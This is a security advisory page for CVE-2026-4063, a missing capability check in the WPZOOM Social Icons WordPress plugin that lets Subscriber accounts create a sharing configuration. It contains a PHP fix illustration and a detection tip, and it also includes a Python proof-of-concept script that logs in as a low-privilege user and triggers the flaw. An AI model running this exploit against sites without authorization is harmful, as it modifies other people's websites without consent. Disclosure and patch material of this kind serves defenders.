Security Vulnerability Report
CVE-2026-4063 CVSS 4.3 MEDIUM

CVE-2026-4063

Published: 2026-03-13 19:55:13
Last Modified: 2026-04-22 21:30:26

Description

The Social Icons Widget & Block by WPZOOM plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check in the add_menu_item() method hooked to admin_menu in all versions up to, and including, 4.5.8. This is due to the method performing wp_insert_post() and update_post_meta() calls to create a sharing configuration without verifying the current user has administrator-level capabilities. This makes it possible for authenticated attackers, with Subscriber-level access and above, to trigger the creation of a published wpzoom-sharing configuration post with default sharing button settings, which causes social sharing buttons to be automatically injected into all post content on the frontend via the the_content filter.
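As an added illustration (not the plugin's own code; function, hook and option names below are hypothetical), the pattern behind this CWE-862 finding and its hardened form. admin_menu fires on every wp-admin page load for every logged-in role, so any database write inside that callback runs for Subscribers too unless it is gated on a capability:

```php
<?php
// Added illustration, not code from the WPZOOM plugin. Names are hypothetical.

// Before: the admin_menu callback itself performs the write. Any logged-in
// user who loads any wp-admin page (Subscribers included) creates a
// published 'wpzoom-sharing' post, which the the_content filter then honours.
function example_add_menu_item_vulnerable() {
    $post_id = wp_insert_post( array(
        'post_type'   => 'wpzoom-sharing',
        'post_title'  => 'Default sharing buttons',
        'post_status' => 'publish',
    ) );
    update_post_meta( $post_id, '_example_buttons', array( 'facebook', 'x' ) );
}

// After: the menu hook only registers a page (WordPress enforces the
// capability passed to add_menu_page), and the write moves behind an
// explicit admin action that checks capability, nonce and idempotency.
function example_add_menu_item_fixed() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return; // low-privilege roles stop here; no side effects
    }
    add_menu_page( 'Sharing', 'Sharing', 'manage_options',
        'example-sharing', 'example_render_sharing_page' );
}

function example_create_default_config() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', 403 );
    }
    check_admin_referer( 'example_create_sharing' ); // CSRF guard

    // Do not create a second configuration if one already exists.
    $existing = get_posts( array(
        'post_type'   => 'wpzoom-sharing',
        'post_status' => 'any',
        'numberposts' => 1,
        'fields'      => 'ids',
    ) );
    if ( ! empty( $existing ) ) {
        return (int) $existing[0];
    }

    $post_id = wp_insert_post( array(
        'post_type'   => 'wpzoom-sharing',
        'post_title'  => 'Default sharing buttons',
        'post_status' => 'publish',
    ) );
    update_post_meta( $post_id, '_example_buttons', array( 'facebook', 'x' ) );
    return (int) $post_id;
}

add_action( 'admin_menu', 'example_add_menu_item_fixed' );
add_action( 'admin_post_example_create_sharing', 'example_create_default_config' );
```

For detection on an unpatched site, the artifact to look for is a published wpzoom-sharing post whose post_author is a non-administrator account, or one created at a time when no administrator was logged in.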

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Social Icons Widget by WPZOOM <= 4.5.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2026-4063 PoC - WPZOOM Social Icons Plugin Privilege Bypass
# Target: WordPress site with vulnerable WPZOOM Social Icons Widget plugin (<=4.5.8)


def check_vulnerability(target_url, username, password):
    """
    Check if target WordPress site is vulnerable to CVE-2026-4063
    This vulnerability allows low-privilege users to trigger sharing configuration creation
    """
    session = requests.Session()

    # Step 1: Login with low-privilege user (subscriber role)
    login_url = f"{target_url}/wp-login.php"
    # wp-login.php rejects the form unless the test cookie is present
    session.cookies.set('wordpress_test_cookie', 'WP Cookie check')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    resp = session.post(login_url, data=login_data, allow_redirects=True)
    # The auth cookie name carries a site-specific hash suffix
    # (wordpress_logged_in_<hash>), so match on the prefix
    if not any(name.startswith('wordpress_logged_in')
               for name in session.cookies.get_dict()):
        print("[-] Login failed")
        return False
    print("[+] Login successful as subscriber")

    # Step 2: Trigger the vulnerability by accessing admin pages
    # The add_menu_item() method is hooked to admin_menu
    # Any admin page access will trigger wp_insert_post()
    admin_pages = [
        '/wp-admin/index.php',
        '/wp-admin/',
        '/wp-admin/edit.php'
    ]
    for page in admin_pages:
        resp = session.get(f"{target_url}{page}")
        if resp.status_code == 200:
            print(f"[+] Accessed {page} - triggered vulnerability")

    # Step 3: Check if wpzoom-sharing post was created
    query_url = f"{target_url}/wp-json/wp/v2/posts?search=wpzoom-sharing"
    resp = session.get(query_url)
    if resp.status_code == 200:
        data = resp.json()
        if data and len(data) > 0:
            print(f"[!] Vulnerability confirmed! Found {len(data)} sharing config post(s)")
            for post in data:
                print(f"    Post ID: {post['id']}, Title: {post['title']['rendered']}")
            return True

    print("[-] No sharing config found (plugin may be patched or different version)")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://example.com subscriber password123")
        sys.exit(1)
    target = sys.argv[1].rstrip('/')
    user = sys.argv[2]
    pwd = sys.argv[3]
    check_vulnerability(target, user, pwd)
```

References

https://plugins.trac.wordpress.org/browser/social-icons-widget-by-wpzoom/tags/4.5.8/includes/classes/class-wpzoom-social-sharing-buttons.php#L110
https://plugins.trac.wordpress.org/browser/social-icons-widget-by-wpzoom/tags/4.5.8/includes/classes/class-wpzoom-social-sharing-buttons.php#L134
https://plugins.trac.wordpress.org/browser/social-icons-widget-by-wpzoom/trunk/includes/classes/class-wpzoom-social-sharing-buttons.php#L110
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3481444%40social-icons-widget-by-wpzoom%2Ftrunk&old=3462717%40social-icons-widget-by-wpzoom%2Ftrunk&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/6af64b51-1758-495f-b6d7-364488de9ab8?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-4063",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-13T19:55:13.300",
    "lastModified": "2026-04-22T21:30:26.497",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Social Icons Widget & Block by WPZOOM plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check in the add_menu_item() method hooked to admin_menu in all versions up to, and including, 4.5.8. This is due to the method performing wp_insert_post() and update_post_meta() calls to create a sharing configuration without verifying the current user has administrator-level capabilities. This makes it possible for authenticated attackers, with Subscriber-level access and above, to trigger the creation of a published wpzoom-sharing configuration post with default sharing button settings, which causes social sharing buttons to be automatically injected into all post content on the frontend via the the_content filter."
      },
      {
        "lang": "es",
        "value": "El plugin Social Icons Widget &amp; Block de WPZOOM para WordPress es vulnerable a la modificación no autorizada de datos debido a una falta de verificación de capacidad en el método add_menu_item() enganchado a admin_menu en todas las versiones hasta la 4.5.8, inclusive. Esto se debe a que el método realiza llamadas a wp_insert_post() y update_post_meta() para crear una configuración de compartición sin verificar que el usuario actual tenga capacidades de nivel de administrador. Esto hace posible que atacantes autenticados, con acceso de nivel de Suscriptor y superior, activen la creación de una publicación de configuración de compartición wpzoom publicada con la configuración predeterminada de los botones de compartición, lo que provoca que los botones de compartición social se inyecten automáticamente en todo el contenido de las publicaciones en el frontend a través del filtro the_content."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-862"}]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/social-icons-widget-by-wpzoom/tags/4.5.8/includes/classes/class-wpzoom-social-sharing-buttons.php#L110", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/social-icons-widget-by-wpzoom/tags/4.5.8/includes/classes/class-wpzoom-social-sharing-buttons.php#L134", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/social-icons-widget-by-wpzoom/trunk/includes/classes/class-wpzoom-social-sharing-buttons.php#L110", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3481444%40social-icons-widget-by-wpzoom%2Ftrunk&old=3462717%40social-icons-widget-by-wpzoom%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6af64b51-1758-495f-b6d7-364488de9ab8?source=cve", "source": "[email protected]"}
    ]
  }
}